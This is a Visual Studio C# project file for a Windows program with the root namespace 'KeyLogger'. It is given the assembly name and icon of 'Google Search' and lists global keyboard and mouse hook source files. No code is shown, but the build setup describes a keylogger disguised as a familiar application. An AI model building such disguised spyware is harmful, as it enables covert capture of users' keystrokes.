﻿<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="14.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
  <PropertyGroup>
    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
    <ProjectGuid>{60CA9991-90B6-45EB-9E08-A8888390D9AE}</ProjectGuid>
    <OutputType>WinExe</OutputType>
    <AppDesignerFolder>Properties</AppDesignerFolder>
    <RootNamespace>KeyLogger</RootNamespace>
    <AssemblyName>Google Search</AssemblyName>
    <TargetFrameworkVersion>v4.5.2</TargetFrameworkVersion>
    <FileAlignment>512</FileAlignment>
    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
  </PropertyGroup>
  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
    <PlatformTarget>AnyCPU</PlatformTarget>
    <DebugSymbols>true</DebugSymbols>
    <DebugType>full</DebugType>
    <Optimize>false</Optimize>
    <OutputPath>bin\Debug\</OutputPath>
    <DefineConstants>DEBUG;TRACE</DefineConstants>
    <ErrorReport>prompt</ErrorReport>
    <WarningLevel>4</WarningLevel>
  </PropertyGroup>
  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
    <PlatformTarget>AnyCPU</PlatformTarget>
    <DebugType>pdbonly</DebugType>
    <Optimize>true</Optimize>
    <OutputPath>bin\Release\</OutputPath>
    <DefineConstants>TRACE</DefineConstants>
    <ErrorReport>prompt</ErrorReport>
    <WarningLevel>4</WarningLevel>
  </PropertyGroup>
  <PropertyGroup>
    <ApplicationIcon>Google-Search-Default.ico</ApplicationIcon>
  </PropertyGroup>
  <ItemGroup>
    <Reference Include="System" />
    <Reference Include="System.Core" />
    <Reference Include="System.Xml.Linq" />
    <Reference Include="System.Data.DataSetExtensions" />
    <Reference Include="Microsoft.CSharp" />
    <Reference Include="System.Data" />
    <Reference Include="System.Deployment" />
    <Reference Include="System.Drawing" />
    <Reference Include="System.Net.Http" />
    <Reference Include="System.Windows.Forms" />
    <Reference Include="System.Xml" />
  </ItemGroup>
  <ItemGroup>
    <Compile Include="AddKeyToList.cs" />
    <Compile Include="Form1.cs">
      <SubType>Form</SubType>
    </Compile>
    <Compile Include="Form1.Designer.cs">
      <DependentUpon>Form1.cs</DependentUpon>
    </Compile>
    <Compile Include="Functions.cs" />
    <Compile Include="KeyMap.cs" />
    <Compile Include="KeyMapper.cs" />
    <Compile Include="Lib\BaseHookListener.cs" />
    <Compile Include="Lib\Controls\HookType.cs" />
    <Compile Include="Lib\Controls\MouseKeyEventProvider.cs">
      <SubType>Component</SubType>
    </Compile>
    <Compile Include="Lib\HotKeys\HotKeyArgs.cs" />
    <Compile Include="Lib\HotKeys\HotKeySet.cs" />
    <Compile Include="Lib\HotKeys\HotKeySetCollection.cs" />
    <Compile Include="Lib\HotKeys\HotKeySetsListener.cs" />
    <Compile Include="Lib\KeyboardHookListener.cs" />
    <Compile Include="Lib\KeyboardState.cs" />
    <Compile Include="Lib\KeyEventArgsExt.cs" />
    <Compile Include="Lib\KeyPressEventArgsExt.cs" />
    <Compile Include="Lib\MouseEventExtArgs.cs" />
    <Compile Include="Lib\MouseHookListener.cs" />
    <Compile Include="Lib\WinApi\AppHooker.cs" />
    <Compile Include="Lib\WinApi\GlobalHooker.cs" />
    <Compile Include="Lib\WinApi\HookCallback.cs" />
    <Compile Include="Lib\WinApi\Hooker.cs" />
    <Compile Include="Lib\WinApi\HookNativeMethods.cs" />
    <Compile Include="Lib\WinApi\KeyboardHookStruct.cs" />
    <Compile Include="Lib\WinApi\KeyboardNativeMethods.cs" />
    <Compile Include="Lib\WinApi\Messages.cs" />
    <Compile Include="Lib\WinApi\MouseNativeMethods.cs" />
    <Compile Include="Lib\WinApi\MouseStructures.cs" />
    <Compile Include="Lib\WinApi\Point.cs" />
    <Compile Include="Lib\WinApi\ThreadNativeMethods.cs" />
    <Compile Include="Program.cs" />
    <Compile Include="Properties\AssemblyInfo.cs" />
    <EmbeddedResource Include="Form1.resx">
      <DependentUpon>Form1.cs</DependentUpon>
    </EmbeddedResource>
    <EmbeddedResource Include="Properties\Resources.resx">
      <Generator>ResXFileCodeGenerator</Generator>
      <LastGenOutput>Resources.Designer.cs</LastGenOutput>
      <SubType>Designer</SubType>
    </EmbeddedResource>
    <Compile Include="Properties\Resources.Designer.cs">
      <AutoGen>True</AutoGen>
      <DependentUpon>Resources.resx</DependentUpon>
      <DesignTime>True</DesignTime>
    </Compile>
    <None Include="Properties\Settings.settings">
      <Generator>SettingsSingleFileGenerator</Generator>
      <LastGenOutput>Settings.Designer.cs</LastGenOutput>
    </None>
    <Compile Include="Properties\Settings.Designer.cs">
      <AutoGen>True</AutoGen>
      <DependentUpon>Settings.settings</DependentUpon>
      <DesignTimeSharedInput>True</DesignTimeSharedInput>
    </Compile>
  </ItemGroup>
  <ItemGroup>
    <None Include="App.config" />
  </ItemGroup>
  <ItemGroup>
    <None Include="Resources\Icon1.ico" />
    <None Include="Resources\Google-Search-Default.ico" />
    <Content Include="Google-Search-Default.ico" />
    <Content Include="troll_image.jpg" />
  </ItemGroup>
  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
  <!-- To modify your build process, add your task inside one of the targets below and uncomment it. 
       Other similar extension points exist, see Microsoft.Common.targets.
  <Target Name="BeforeBuild">
  </Target>
  <Target Name="AfterBuild">
  </Target>
  -->
</Project>